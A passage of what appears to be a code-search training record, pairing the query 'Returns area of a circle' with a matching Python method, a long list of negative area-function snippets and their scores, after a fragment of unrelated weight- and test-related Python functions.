Instead got {0}.\".format(\n np.sum(w)\n ))", "def calculScore(self):\n for cell in self.notComputeRouter:\n if(cell.isCovered==True):\n self.score += 1000\n self.score += self.budget", "def _negative_weights_limit_sum(self, value):\n weights = self # simpler to change to data attribute and nicer to read\n value = abs(value) # simplify code, prevent erroneous assertion error\n if sum(weights[self.mu:]) >= -value: # nothing to limit\n return # needed when sum is zero\n assert weights[-1] < 0 and weights[self.mu] <= 0\n factor = abs(value / sum(weights[self.mu:]))\n if factor < 1:\n for i in range(self.mu, self.lambda_):\n weights[i] *= factor\n if self.debug:\n print(\"sum w = %.2f (with correction %.2f)\" %\n (sum(weights), value))\n assert sum(weights) + 1e-5 >= 1 - value", "def binary_weight_neg(self) -> float:\n articles_of_not_theme_count = self.total_article_count - self.article_of_theme_count\n return (1 / articles_of_not_theme_count)*(self.total_article_count)/2.0", "def test_negative_weights(self):\n values = np.array([0, 1, 2, 2, 3])\n weights = np.array([1, -1, 3, -2, 1])\n\n hist_exp = np.array([1, -1, 2])\n # uncertainties are the sqrt(sum of squared weights)\n unc_exp = np.sqrt(np.array([1, (-1) ** 2, 3**2 + (-2) ** 2 + 1]))\n\n _, hist, unc, _ = hist_w_unc(values, weights=weights, bins=3, normed=False)\n np.testing.assert_array_almost_equal(hist_exp, hist)\n np.testing.assert_array_almost_equal(unc_exp, unc)", "def test_percentage_is_100(self):\n metric = self.metric(direction=\">\")\n sources = [self.source(metric, value=\"0\", total=\"0\")]\n measurement = self.measurement(metric, sources=sources)\n self.assertEqual(\"100\", measurement[\"percentage\"][\"value\"])", "def test_accuracy(self):\n total_accuracy, weights = losses.weighted_accuracy(\n logits=self.logits, targets=self.targets)\n\n expected_accuracy = 2 / 3\n\n self.assertEqual(weights, 3)\n self.assertAlmostEqual(total_accuracy / weights, expected_accuracy)", "def _check_amount_with_priority(self):\n\t\tfor slc in self:\n\t\t\tif slc.max_amount and self.search([('priority', '<', slc.priority), ('max_amount', '>=', slc.max_amount)]):\n\t\t\t\traise Warning(_(\"There are below slides [Priority less than %s] with bigger amount from [%s]\"\n\t\t\t\t \" which against the logic!!!\\n You can increase amount or handel priority\")\n\t\t\t\t % (slc.priority, slc.max_amount))", "def check_overall_energy(self):\n energy = 0\n for student in self.students:\n energy += int(student.energy_level)\n for mentor in self.mentors:\n energy += int(mentor.energy_level)\n print(\"Overall energy equals \", energy)", "def loss_check(self):\n if sum(x >= y for x, y in zip(self.elbos[-100:], self.elbos[-99:])) > 50 and\\\n self.elbos[-1] - self.elbos[-100] < 1e-3*abs(self.elbos[-100]):\n return True", "def test_return_goal_weight_actual_weight_is_too_low(self):\n data_weight_user = {\"height\": \"1,60\", \"actual_weight\": \"45\",\n \"cruising_weight\": \"45\", \"weight_goal\": \"40\"}\n goal_weight = self.new_weight_advice_goal.return_weight_advices_goal(data_weight_user)[2]\n\n self.assertFalse(goal_weight)", "def test_values(self):\n result = NonLinearWeights(0.6).nonlinear_weights(6)\n expected_result = np.array(\n [0.41957573, 0.25174544, 0.15104726, 0.09062836, 0.05437701, 0.03262621]\n )\n self.assertArrayAlmostEqual(result.data, expected_result)", "def test_node_weight_range_min(self):\n n = Node(inputs=6)\n for i in n.weights:\n self.assertGreaterEqual(i, -0.1)", "def weighted_estimation(self) -> bool:\n pass", "def 
test_random_100_balance_remains_between_1_and_negative_1(bst_100_rand):\n assert bst_100_rand.balance() in range(-1, 2)", "def test_return_goal_goal_weight_is_too_low(self):\n data_weight_user = {\"height\": \"1,60\", \"actual_weight\": \"60\",\n \"cruising_weight\": \"45\", \"weight_goal\": \"40\"}\n return_goal = self.new_weight_advice_goal.return_weight_advices_goal(data_weight_user)[0]\n\n self.assertEqual(return_goal, 12.6)", "def test_node_weight_range_max(self):\n n = Node(inputs=3)\n for i in n.weights:\n self.assertLess(i, 0.1)", "def test_percentage_lost_weight(self):\n user_created = self.create_user()\n percentage_return = self.new_calculation.percentage_lost_weight(user_created)\n\n self.assertEqual(percentage_return, 10)\n self.assertEqual(type(percentage_return), int)", "def test_bayes_updates_good_data(self):\r\n # result for first -> fourth calculated by hand\r\n for obs, exp in zip(bayes_updates(self.test), self.result):\r\n self.assertFloatEqualAbs(obs, exp, 1e-11)", "def validate(self):\n if self.isEmpty(): return False\n\n sum = 0\n for item in self.mask:\n sum += item.prob\n return sum == 1", "def test_probabilities_are_ok(self, seed):\n bins = defaultdict(int)\n probs = (0.1, 0.2, 0.3, 0.4)\n categories = (\"asdfa\", \"2\", \"3\", \"4\")\n categories = OrderedDict(zip(categories, probs))\n dim = Categorical(\"yolo\", categories)\n for _ in range(500):\n sample = dim.sample(seed=seed)[0]\n bins[sample] += 1\n for keys in bins.keys():\n bins[keys] /= float(500)\n for key, value in categories.items():\n assert abs(bins[key] - value) < 0.01", "def test_return_goal_weight_goal_weight_is_too_low(self):\n data_weight_user = {\"height\": \"1,60\", \"actual_weight\": \"60\",\n \"cruising_weight\": \"45\", \"weight_goal\": \"40\"}\n return_goal = self.new_weight_advice_goal.return_weight_advices_goal(data_weight_user)[2]\n\n self.assertEqual(return_goal, 47.4)", "def grade(self) -> float:\n assert self._results, \"Tests have not been run\"\n return sum(\n weight\n for test, weight in self.test_weights.items()\n if self._results[test].wasSuccessful()\n )", "def check_accuracy (data, labels, weights):\n\tcount = 0\n\tgs = []\n\trs = []\n\tfor x in range(0,len(data)):\n\t\tresults = dot(data[x], weights)\n\t\tguess = unit_step(results)\n\t\tgs.append(guess) # append prediction\n\t\trs.append(labels[x]) # append result\n\t\tif guess - labels[x] == 0:\n\t\t\tcount += 1\n\n\tpercentage = ((float(count) / len(data)) * 100)\n\n\treturn percentage", "def test_array_sum_equals_one(self):\n plugin = NonLinearWeights(0.85)\n result = plugin.process(self.cube, self.coord_name)\n self.assertAlmostEqual(result.data.sum(), 1.0)", "def calculate_weighted_results():\n pass", "def test_weight_decrease(self):\n new_weight = (1 - 0.05) * self.herb.weight\n self.herb.weightloss()\n nt.assert_equal(round(self.herb.weight, 7), round(new_weight, 7))", "def test_perc(perc):\n num_wet = perc.num_wet()\n\n while True:\n perc.step()\n\n if perc.bottom_row_wet():\n return True\n\n new_num_wet = perc.num_wet()\n if new_num_wet == num_wet:\n return False\n\n num_wet = new_num_wet", "def test_straight_100_balance_remains_between_1and_negative_1():\n from bbst import Bst\n tree = Bst(x for x in range(100))\n assert tree.balance() in range(-1, 2)", "def test_return_goal_actual_weight_is_too_low(self):\n data_weight_user = {\"height\": \"1,60\", \"actual_weight\": \"45\",\n \"cruising_weight\": \"45\", \"weight_goal\": \"40\"}\n return_goal = 
self.new_weight_advice_goal.return_weight_advices_goal(data_weight_user)[0]\n\n user_goal = \"impossible\"\n self.assertEqual(return_goal, user_goal)", "def check_sum(self) -> str:\n pass", "def _check_cost(self, cr, uid, ids, context=None):\n for enrich in self.browse(cr, uid, ids, context=context):\n if enrich.amount <= 0:\n raise osv.except_osv(_('ValidateError'), _('The Cost Must Be Greater Than Zero!'))\n return True", "def test_uncertainties(self):\n new_wave = np.linspace(0.9, 2.1, 200)\n\n # Without uncertainties\n binned = u.spectres(new_wave, self.wave, self.flux)\n self.assertEqual(len(binned), 2)\n\n # With uncertainties\n binned = u.spectres(new_wave, self.wave, self.flux, self.flux/100.)\n self.assertEqual(len(binned), 3)", "def test_total_integers(self):\n int_list = [5, 10, 50, 35]\n assert cr.total(int_list) == 100", "def administer(self):\n\n score = 0.0\n for question in self.questions:\n if question.ask_and_evaluate() is True:\n score += 1\n return (score / len(self.questions)) * 100", "def normalize_weights(self):\n \n # Set negative weights to zero\n # Normalize to sum to one.\n \n\n\n self.new_weight=[]\n for i in self._weights:\n if any(i < 0 for i in self._weights):\n self.new_weight = [0,1]\n\n elif all(i == 0 for i in self._weights):\n i = 1/len(self._weights)\n self.new_weight.append(i)\n else:\n i = i/sum(self._weights)\n self.new_weight.append(i)\n\n # If the weights are all zeros, set weights equal to 1/k, where k is the number\n # of components.\n self._weights = self.new_weight\n self._weights = np.round(self._weights,3)", "def test_UpdateHealthLessThan0 (self) :\n\t\t\n\t\tself.person3.updateHealth ()\n\t\tself.assertEqual(self.person3.getHealth(), \\\n\t\t100 + self.healthEffect2)\n\t\tself.person3.updateHealth ()\n\t\tself.assertEqual(self.person3.getHealth(), 0)", "def __neff(self):\n return 1. 
/ np.sum(np.square(self.weights))", "def bet_check(m):\n try:\n value = float(m.content)\n if 0 <= value <= player.coins:\n return True\n else:\n return False\n except:\n return False", "def test_non_zero_sum_profile_welfare():\n game = matgame.matgame([[[3.5, 2.5]]])\n assert np.isclose(\n regret.pure_social_welfare(game, [1, 1]), 6\n ), \"didn't properly sum welfare\"", "def test_is_ramped_using_int(self):\n self.feature_test.set_percentage(100)\n self.assertTrue(self.feature_test._is_ramped(5))", "def evaluate_binary_consistency(self):\n\n change_rw = 0\n change_sm = 0\n th = [0.005]\n for threshold in th:\n raw_th = [self.rw_data[t] > threshold for t in range(0, self.T)]\n smooth_th = [self.smth_data[t] > 0 for t in range(0, self.T)]\n # print(\"Zeros rw:\", get_avg_zeros_per_row(raw_th))\n # print(\"Zeros sm:\", get_avg_zeros_per_row(self.smth_data))\n change_rw = change_rw + self.change_of_network_over_time(raw_th)\n change_sm = change_sm + self.change_of_network_over_time(smooth_th)\n\n change_rw = change_rw / len(th)\n change_sm = change_sm / len(th)\n\n return change_rw, change_sm", "def _negative_weights_set_sum(self, value):\n weights = self # simpler to change to data attribute and nicer to read\n value = abs(value) # simplify code, prevent erroneous assertion error\n assert weights[self.mu] <= 0\n if not weights[-1] < 0:\n # breaks if mu == lambda\n # we could also just return here\n # return\n istart = max((self.mu, int(self.lambda_ / 2)))\n for i in range(istart, self.lambda_):\n weights[i] = -value / (self.lambda_ - istart)\n factor = abs(value / sum(weights[self.mu:]))\n for i in range(self.mu, self.lambda_):\n weights[i] *= factor\n assert 1 - value - 1e-5 < sum(weights) < 1 - value + 1e-5\n if self.debug:\n print(\"sum w = %.2f, sum w^- = %.2f\" %\n (sum(weights), -sum(weights[self.mu:])))", "def if_any(self, other):\n return self.weighted_by_sum(other)", "def sample_contribution_(bin_weights, sample_i, sample_weight, model, specific_scores, Y):\n\n bin_weight = np.sum([w for _, w in bin_weights])\n return sample_weight / bin_weight * (\n (Y[sample_i] == model.classes_[class_index]) - specific_scores[sample_i])", "def test_false_positive_rate(self):\n # For the penalty, the default loss is hinge.\n expected_penalty_numerator = np.sum(\n np.maximum(0.0, 1.0 + self._penalty_predictions) *\n (self._penalty_labels <= 0.0) * self._penalty_weights *\n self._penalty_predicate)\n expected_penalty_denominator = np.sum(\n (self._penalty_labels <= 0.0) * self._penalty_weights *\n self._penalty_predicate)\n expected_penalty_value = (\n expected_penalty_numerator / expected_penalty_denominator)\n\n # For the constraint, the default loss is zero-one.\n expected_constraint_numerator = np.sum(\n (0.5 * (1.0 + np.sign(self._constraint_predictions))) *\n (self._constraint_labels <= 0.0) * self._constraint_weights *\n self._constraint_predicate)\n expected_constraint_denominator = np.sum(\n (self._constraint_labels <= 0.0) * self._constraint_weights *\n self._constraint_predicate)\n expected_constraint_value = (\n expected_constraint_numerator / expected_constraint_denominator)\n\n actual_expression = binary_rates.false_positive_rate(self.context)\n self.check_rates(expected_penalty_value, expected_constraint_value,\n actual_expression)", "def test_non_zero_loss(self):\n # Reset models.\n self.model.load_state_dict(self.initial_model_dict)\n self.actor_model.load_state_dict(self.initial_actor_model_dict)\n\n polybeast.learn(*self.learn_args)\n\n 
self.assertNotEqual(self.stats[\"total_loss\"], 0.0)\n self.assertNotEqual(self.stats[\"pg_loss\"], 0.0)\n self.assertNotEqual(self.stats[\"baseline_loss\"], 0.0)\n self.assertNotEqual(self.stats[\"entropy_loss\"], 0.0)", "def testConsistency(self):\n #self.assertAlmostEqual(self.fxlinkedcashflow.amount(),0)", "def weightedBoldness(self):\n\n\t\treturn sum([blend.varietal.boldness * blend.portion / 100.0 for blend in self.blends])", "def test_histogram_weighted_not_normalised(self):\n bin_edges, hist, unc, band = hist_w_unc(\n self.input, weights=self.weights, bins=self.n_bins, normed=False\n )\n\n np.testing.assert_array_almost_equal(self.bin_edges, bin_edges)\n np.testing.assert_array_almost_equal(self.hist_weighted, hist)\n np.testing.assert_array_almost_equal(self.unc_weighted, unc)\n np.testing.assert_array_almost_equal(self.band_weighted, band)", "def test_check_null_weight_with_nonzeros() -> None:\n sample_weight = np.ones_like(y_toy)\n sw_out, X_out, y_out = check_null_weight(sample_weight, X_toy, y_toy)\n np.testing.assert_almost_equal(sw_out, sample_weight)\n np.testing.assert_almost_equal(X_out, X_toy)\n np.testing.assert_almost_equal(y_out, y_toy)", "def test_barnes_weights():\n kappa = 1000000\n\n gamma = 0.5\n\n dist = np.array([1000, 2000, 3000, 4000])**2\n\n weights = barnes_weights(dist, kappa, gamma) * 10000000\n\n truth = [1353352.832366126918939,\n 3354.626279025118388,\n .152299797447126,\n .000000126641655]\n\n assert_array_almost_equal(truth, weights)", "def test_barnes_weights():\n kappa = 1000000\n\n gamma = 0.5\n\n dist = np.array([1000, 2000, 3000, 4000])**2\n\n weights = barnes_weights(dist, kappa, gamma) * 10000000\n\n truth = [1353352.832366126918939,\n 3354.626279025118388,\n .152299797447126,\n .000000126641655]\n\n assert_array_almost_equal(truth, weights)", "def test_return_goal_under_cruising_weight(self):\n data_weight_user = {\"height\": \"1,60\", \"actual_weight\": \"60\",\n \"cruising_weight\": \"55\", \"weight_goal\": \"51\"}\n return_goal = self.new_weight_advice_goal.return_weight_advices_goal(data_weight_user)[0]\n\n self.assertEqual(return_goal, 9)", "def test_return_goal_weight_under_cruising_weight(self):\n data_weight_user = {\"height\": \"1,60\", \"actual_weight\": \"60\",\n \"cruising_weight\": \"55\", \"weight_goal\": \"51\"}\n return_goal = self.new_weight_advice_goal.return_weight_advices_goal(data_weight_user)[2]\n\n self.assertEqual(return_goal, 51)", "def activate(self, inputs):\n\t\tstrength = np.dot(self.weights, inputs)\n\t\t# if strength <= self.threshold:\n\t\t# \tself.result = 0\n\t\t# else:\n\t\t# \tself.result = 1\n\t\t# return self.result\n\t\treturn int(strength > self.threshold)", "def test_feeding_weight_carn(self):\n original = self.carn.weight\n self.carn.fitness = 1\n herb = [Herbivore(age=90) for _ in range(50)]\n self.carn.feeding(herb)\n nt.assert_greater(self.carn.weight, original)", "def percent_raised(self):\n total_cost = self.total_cost()\n if total_cost:\n return round(self.total_raised() * 100 / total_cost, 2)\n else:\n return 0", "def calcul_max_loss(self, percent_allowable_loss):\n if self.capital * percent_allowable_loss / 100 > self.minimal_buy:\n return self.capital * percent_allowable_loss / 100\n else:\n return self.minimal_buy", "def calculate_profit(self):", "def is_dominant_weight(self): # Or is_dominant_integral_weight?\n alphacheck = self.parent().simple_coroots()\n from sage.rings.semirings.non_negative_integer_semiring import NN\n return all(self.inner_product(alphacheck[i]) in NN\n for i in 
self.parent().index_set())", "def is_valid(self):\n sum_prob_per_var = {}\n for rule in self.rules:\n var, prob = rule.variable, rule.probability\n if prob < 0:\n return False\n sum_prob_per_var[var] = sum_prob_per_var.get(var, 0) + prob\n return all(sum_prob == 1.0 for sum_prob in sum_prob_per_var.values())", "def assert_positive(x):\n \n assert(all(x) >= 0)", "def perform_strategy(self, counter):\r\n if counter < self.percent * len(self.envelopes): # in the first self.percent percent\r\n self.curr_max = max(self.curr_max, self.envelopes[counter].money)\r\n return\r\n return self.envelopes[counter].money > self.curr_max", "def test_feeding_weight(self):\n original = 20\n self.herb.weight = 20\n self.herb.feeding(10)\n nt.assert_greater(self.herb.weight, original)", "def test_two_player_zero_sum_pure_wellfare(strategies):\n game = gamegen.two_player_zero_sum_game(strategies)\n for prof in game.profiles():\n assert np.isclose(\n regret.pure_social_welfare(game, prof), 0\n ), \"zero sum profile wasn't zero sum\"", "def check(self):\n self.lower_bound(5e-4)\n self.upper_bound(5e2)", "def test_percentage_is_zero(self):\n metric = self.metric(direction=\"<\")\n sources = [self.source(metric, value=\"0\", total=\"0\")]\n measurement = self.measurement(metric, sources=sources)\n self.assertEqual(\"0\", measurement[\"percentage\"][\"value\"])", "def validateInputWeightCounts(cheese_weights, n):\r\n wght_count_flag = True\r\n if len(cheese_weights) < n:\r\n wght_count_flag = False\r\n print(\"Invalid Input, provided weights are lesser \"\r\n \"than the earlier input weight count\")\r\n print(\"Exiting....\")\r\n elif len(cheese_weights) < n:\r\n wght_count_flag = False\r\n print(\"Invalid Input, provided weights are more\" \r\n \"than the earlier input weight count %s\", str(n))\r\n print(\"Exiting....\")\r\n return wght_count_flag", "def bin_contribution_(bin_weights, card_dataset, sample_contributions):\n bin_weight = np.sum([w for _, w in bin_weights])\n return bin_weight / card_dataset * np.abs(np.sum(sample_contributions))", "def test_compute_unnormalized_scores(self):\n # todo: implement this test!\n pass", "def get_expected_objective(self) -> float:\n # pylint: disable=invalid-name\n obj = 0.\n for gr in self.grounded.values():\n dist = gr.get_expected_dist_to_satisfaction()\n obj += 1 - self.weight * max(0, dist) ** 2\n return obj", "def calcul_risk(self):\n if (self.take_profit - self.buy_price) >= (\n self.buy_price - self.stop_loss\n ) * self.risk:\n return True\n else:\n return False", "def test(self, tweets, without_neutral=True):\n correct = 0\n total = 0\n for tweet in tweets:\n assert tweet.polarity is not None\n if tweet.is_neutral() and without_neutral:\n continue\n\n if tweet.polarity == self.predict_sentiment_enum(tweet, without_neutral):\n correct += 1\n\n total += 1\n\n print(\"correct = \", correct, \"total = \", total)\n return correct / total", "def compare_sum(values, weights):\n return np.sum(values.numpy())", "def _no_improve(self):\n improve = [p-f for (f,p),_ in self.population]\n return np.mean(improve) < 1.0", "def scoring(self):\n return -100 if self.loss_condition() else 0", "def test_check_null_weight_with_zeros() -> None:\n sample_weight = np.ones_like(y_toy)\n sample_weight[:1] = 0.0\n sw_out, X_out, y_out = check_null_weight(sample_weight, X_toy, y_toy)\n np.testing.assert_almost_equal(sw_out, np.array([1, 1, 1, 1, 1]))\n np.testing.assert_almost_equal(X_out, np.array([[1], [2], [3], [4], [5]]))\n np.testing.assert_almost_equal(y_out, np.array([7, 9, 11, 13, 
15]))", "def test_weight(self):\n # create a coconut of each type\n self.nuts = [Coconut(variety) for variety in ['middle eastern',\n 'south asian',\n 'american']]\n \n # check that weights are as expected\n self.weights = [2.5, 3.0, 3.5]\n for i in range(0,3):\n self.assertEqual(self.nuts[i]._Coconut__weight,\n self.weights[i],\n \"The weight is wrong\")", "def expose(self, w):\n # Compute the weighted sum of the firing inputs\n s = self.strength[list(w.offset)].sum()\n if self.training:\n return s >= self.H\n else:\n return s >= self.H*self.G", "def check_sum(self):\r\n self.num_agents = self.probabilities.shape[0]\r\n self.num_choices = self.probabilities.shape[-1]\r\n #print 'OLD CUM SUM'\r\n #cumsum_across_rows = self.probabilities.cumsum(-1)[:,-1]\r\n #print cumsum_across_rows\r\n #print 'NEW CUM SUM'\r\n cumsum_across_rows = self.probabilities.sum(-1)\r\n #print cumsum_across_rows\r\n diff_from_unity = abs(cumsum_across_rows - 1)\r\n #print self.probabilities\r\n #print diff_from_unity\r\n #print diff_from_unity\r\n #rowsId = diff_from_unity < 1e-6\r\n #a = array(range(self.probabilities.shape[0]))+1\r\n\r\n #print self.probabilities[~rowsId], a[~rowsId]\r\n\r\n if not ma.all(diff_from_unity < 1e-6):\r\n raise ProbabilityError, \"\"\"probability values do not add up \"\"\" \\\r\n \"\"\"to one across rows\"\"\"", "def is_number_correct(total):\n if int(total) < 0:\n return None\n return True", "def estimate_total_health(self) -> None:\n crew_health = 0\n for operator in self.__operators:\n crew_health += operator.health\n crew_health += self.__health\n self.__health = crew_health / (len(self.__operators) + 1)", "def SetPRBinConstraint(self, model ) :\n tot = np.multiply(self.wish, self.dispo)\n for val in tot :\n if not val : continue\n if self.bound>0 : model += val <= self.valBound\n elif self.bound<0 : model += val >= self.valBound", "def test_probability_of_all_successes():\n\n assert(probability_of_all_successes(1/2,1,2) == 0.25)\n assert(are_close(probability_of_all_successes(1/6,1,2), 1/36, 0.001))\n assert(are_close(probability_of_all_successes(1/2,2,2), 7/16, 0.001))", "def test_weighted_exam(self):\r\n self.weighted_setup()\r\n self.submit_question_answer('FinalQuestion', {'2_1': 'Correct', '2_2': 'Correct'})\r\n self.check_grade_percent(0.75)", "def calc_is_weight(self, nodes_value):\n beta = self.beta.step()\n nodes_value = torch.tensor(nodes_value)\n sample_probabilities = nodes_value / self.sum_tree.top_node.value\n weights = ((1 / (len(self) * sample_probabilities.to(self.device))) ** beta)\n weights /= weights.max()\n return weights", "def evaluateVoteCount(toCompare):\n\n #weight = 0\n\n if int(toCompare['vote_count']) >= 5000:\n weight = 100\n elif 3000 <= int(toCompare['vote_count']) < 5000:\n weight = 80\n elif 2000 <= int(toCompare['vote_count']) < 3000:\n weight = 60\n elif 1000 <= int(toCompare['vote_count']) < 2000:\n weight = 40\n elif 500 <= int(toCompare['vote_count']) < 1000:\n weight = 20\n else:\n weight = 0\n return weight" ]
[ "0.65198725", "0.6382042", "0.63662297", "0.6255529", "0.62205875", "0.61262256", "0.6087317", "0.598844", "0.59880143", "0.5920109", "0.5900693", "0.5828325", "0.58246195", "0.5804198", "0.57612586", "0.5741681", "0.5738628", "0.5719216", "0.56939536", "0.56896657", "0.5688386", "0.56793255", "0.5669221", "0.5629621", "0.56193066", "0.5604948", "0.56000274", "0.5596337", "0.55854905", "0.55748737", "0.5571769", "0.5552702", "0.55461335", "0.5545532", "0.55192274", "0.5511455", "0.5505226", "0.5498765", "0.54813755", "0.5461982", "0.5461316", "0.545231", "0.54430676", "0.5434512", "0.5433004", "0.54235876", "0.5412957", "0.5410792", "0.5408024", "0.5399825", "0.5399726", "0.5399404", "0.5384428", "0.5372976", "0.53677905", "0.5354475", "0.5353375", "0.53499377", "0.53485984", "0.5342023", "0.533998", "0.5323141", "0.532279", "0.5321927", "0.5321927", "0.532133", "0.5315572", "0.5314054", "0.53135055", "0.530951", "0.53060013", "0.52995366", "0.5292549", "0.5287765", "0.5282542", "0.527624", "0.5276015", "0.5273359", "0.52676785", "0.52603185", "0.52602446", "0.52592516", "0.5258331", "0.52558935", "0.5252852", "0.5251124", "0.5246202", "0.5246031", "0.5230801", "0.5227174", "0.5222754", "0.52186984", "0.5217663", "0.5206307", "0.5202208", "0.52016526", "0.5201005", "0.52001154", "0.5192943", "0.5191482" ]
0.54984707
38
Returns area of a circle
def area(self): return math.pi * self._r ** 2
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def circle_area(circle):\n return pi * circle.radius * circle.radius", "def area_of_circle(radius):\n return radius", "def circle_area(radius):\n area = radius ** 2 * math.pi\n return area", "def area(self):\n\t\t#print (self.radius*self.radius*math.pi)\n\t\tcircle_area = (self.radius*self.radius*math.pi)\n\t\treturn circle_area", "def area_circle(radius):\n \n pi = 3.1459\n area = pi * radius * radius\n return area", "def circle_area(radius):\n return math.pi * radius ** 2", "def circleArea(radius):\n return math.pi * radius * radius", "def area_circle(r):\n return (r ** 2) * math.pi", "def area_of_circle(r):\n a = r**2 * math.pi\n return a", "def area_of_circle(r):\n a = r**2 * math.pi\n return a", "def circle_area(self):\n return np.pi * self.ring_radius ** 2", "def circleArea(radius):\n radius = float(radius)\n return math.pi*(radius**2)", "def circle_area(radius : number) -> number:\n area = pi*radius*radius\n #print(\"The area of circle is =\", area, \"sq.units\")\n return area", "def area(self):\n return self.radius*self.radius*math.pi", "def area(self):\n return (self.__radius ** 2 * math.pi)", "def area(self):\n return math.pi * self.radius ** 2", "def area(self):\n return math.pi * self.radius ** 2", "def area(self):\r\n return math.pi*(self.__radius**2)", "def area(self):\n return math.pi * math.pow(self.radius, 2)", "def area_of_circle(radius = radious):\n area = radius * radious * 3.142\n print(\"Calculating area...\")\n time.sleep(2)\n return area", "def area_circle(l):\n a = math.pi * ((l / 2) ** 2)\n return a", "def area(self):\n return math.pi*self._radius*self._radius", "def getArea(self):\n return math.pi * self.radius ** 2", "def area_circle(radius):\n area = PI * radius**2\n return '{:.4f}'.format(area)", "def area_circle(radius: float) -> float:\r\n if radius < 0:\r\n raise ValueError(\"area_circle() only accepts non-negative values\")\r\n return pi * radius**2", "def circle_area(r):\n if r < 0:\n raise ValueError(\"Radius cannot be negative\")\n\n return pi*(r**2)", "def getArea(self):\n return math.pi * self.__radius * self.__radius", "def calculate_area(radius):\n area = math.pi * radius ** 2\n print(\"Area of a circle with a radius of\", radius, \"is\",\n format(area, \".3f\"))", "def circle_area(pop):\n\treturn math.pi * pop / (200.0 ** 2)", "def compute_area(radius):\n radius = int(input(\"What is the radius of the circle? \\n> \"))\n \n while radius <=0:\n radius = int(input(\"Sorry, must give a number greater than 0. 
\\n> \"))\n \n area = (pi * pow(radius, 2))\n \n #t.circle(radius)\n \n return area", "def area(radius):\n from math import pi\n if radius<0:\n return None\n else: \n return radius**2*pi", "def calculate_area(radius: int) -> None:\n\n # process\n area = math.pi * radius ** 2\n\n # output\n print(f\"The area is {area:.2f} cm²\")", "def area(x, y):\n return x*y/2", "def cone_area(radius: number, height: number) -> number:\n return pi*radius*(radius + sqrt(radius**2 + height**2))", "def circle_surface_area(a):\n return (a*a*math.pi)", "def area(r):\n return np.pi * (r ** 2)", "def area(symbol):\n return (symbol.bounding_box.vertices[2].x - symbol.bounding_box.vertices[0].x) * (\n symbol.bounding_box.vertices[2].y - symbol.bounding_box[0].y)", "def calc_area(diameter):\n\n if diameter > 0:\n area = pi * (diameter/2) ** 2\n \n return area", "def cylinder_area(radius: number, height: number) -> number:\n area = 2*pi*radius*(radius+height)\n return area", "def area(\n self):\n pi = numpy.pi\n area0 = 4.0 * pi / 8.0\n areadiv = 4.0 ** self.depth\n area = area0 / areadiv * (180.0 / pi) ** 2\n return area", "def Intarea( xc, yc, r, x0, x1, y0, y1):\n\n#\n# Shift the objects so that the circle is at the origin.\n#\n x0 = x0 - xc\n y0 = y0 - yc\n x1 = x1 - xc\n y1 = y1 - yc\n\n return Oneside( x1, y0, y1, r ) + Oneside( y1, -x1, -x0, r ) +\\\n Oneside( -x0, -y1, -y0, r ) + Oneside( -y0, x0, x1, r )", "def area(diam):\n radius = diam / 2\n return(pi * radius * radius)", "def sphere_area(radius : number) -> number:\n area = 4*pi*radius*radius\n return area", "def circumference_area(radius):\n return float('%.3f'%(radius * math.pi))", "def area(x1, y1, x2, y2, x3, y3):\n return abs((x1 * (y2 - y3) + x2 * (y3 - y1) + x3 * (y1 - y2)) / 2.0)", "def area_ellipse(radius_x: float, radius_y: float) -> float:\r\n if radius_x < 0 or radius_y < 0:\r\n raise ValueError(\"area_ellipse() only accepts non-negative values\")\r\n return pi * radius_x * radius_y", "def sphereArea(radius):\n area = 4 * math.pi * radius ** 2\n return area", "def findArea(self):\n\n a, b = self.sides\n area = a * b\n print(f\"Are of rectangle is: {area}\")", "def area(self):\n area = 0\n last = self._coordinates[-1]\n for c in self._coordinates:\n area += (last[0] * c[1] - last[1] * c[0])\n last = c\n return float(\"{:.2f}\".format(abs(area) * 0.5))", "def area(self):\n area = 0.25*self._sides*self._length**2 / math.tan(math.radians(180/self._sides))\n return float('{:.2f}'.format(area))", "def area(self):\n if isinstance(self.crs, GeographicalCRS):\n major_axis = self.crs.ellipsoid.a\n minor_axis = self.crs.ellipsoid.b\n\n area = 0.0\n if major_axis == minor_axis: # Sphere\n for seg in self.segment_tuples:\n x1, y1 = seg[0]\n x2, y2 = seg[1]\n area += geodesy.spherical_area(major_axis, x1, y1, x2, y2)\n\n else:\n for seg in self.segment_tuples:\n x1, y1 = seg[0]\n x2, y2 = seg[1]\n area += geodesy.ellipsoidal_area(major_axis, minor_axis,\n x1, y1, x2, y2)\n\n else:\n # Cartesian coordinate systems\n x, y = self.coordinates\n x0 = np.min(x)\n area = (0.5*(x[0] + x[-1]) - x0) * (y[0] - y[-1])\n area += sum((0.5*(x[i+1]+x[i]) - x0) * (y[i+1] - y[i]) for i in range(len(x)-1))\n return abs(area) - sum(sub.area for sub in self.subs)", "def area(self):\n return self._ned_shape.area", "def area(self) -> float:\n raise NotImplementedError", "def area(self):\n\n return (self.x1 - self.x0) * (self.y1 - self.y0)", "def surface_area(self) -> float:\n return 4 * np.pi * self.radius**2", "def area(width, height):\n return width * height", "def 
area(self):\n return (self.baselength1 + self.baselength2)*self.height/2", "def area(self):\n num_rows = self.row_end - self.row_start\n num_cols = self.col_end - self.col_start\n area = num_rows*num_cols\n return area", "def area(self):\n return 0.5*np.abs(np.dot(self.x,np.roll(self.y,1))-np.dot(self.y,np.roll(self.x,1)))", "def area_equilat(side):\n\treturn side/2 * math.sqrt(side**2 - (side/2)**2)", "def area(self):\n area = self._lengths[0] * self._lengths[1] * math.sin(math.radians(self._angles[0]))\n area += self._lengths[2] * self._lengths[3] * math.sin(math.radians(self._angles[0]))\n return float('{:.2f}'.format(area * 0.5))", "def area(self):\n return self.length*self.length", "def area(self):\n area = self.__width * self.__height\n return area", "def area(self) -> npt.NDArray[np.float_]:\n points = self._normalized_projection()\n a = sum(det(points[..., [0, i, i + 1], :]) for i in range(1, points.shape[-2] - 1))\n return 1 / 2 * np.abs(a)", "def area(self):\n return(self.__width * self.__height)", "def area(self) -> float:\n return cross3(self.b.position - self.a.position,\n self.c.position - self.a.position).length() / 2.0", "def area(self):\n semi_perimeter = self.perimeter() / 2\n area = semi_perimeter\n for l in self._lengths:\n area *= (semi_perimeter - l)\n return float('{:.2f}'.format(area**0.5))", "def area(self):\n if len(self.exterior) < 3:\n raise Exception(\"Cannot compute the polygon's area because it contains less than three points.\")\n poly = self.to_shapely_polygon()\n return poly.area", "def area(self):\n area = self.__size * self.__size\n return area", "def area(base, height):\n\n return base * height", "def area(self):\n area = self.__size * self.__size\n return(area)", "def calculateDetectorArea(self):\n area = 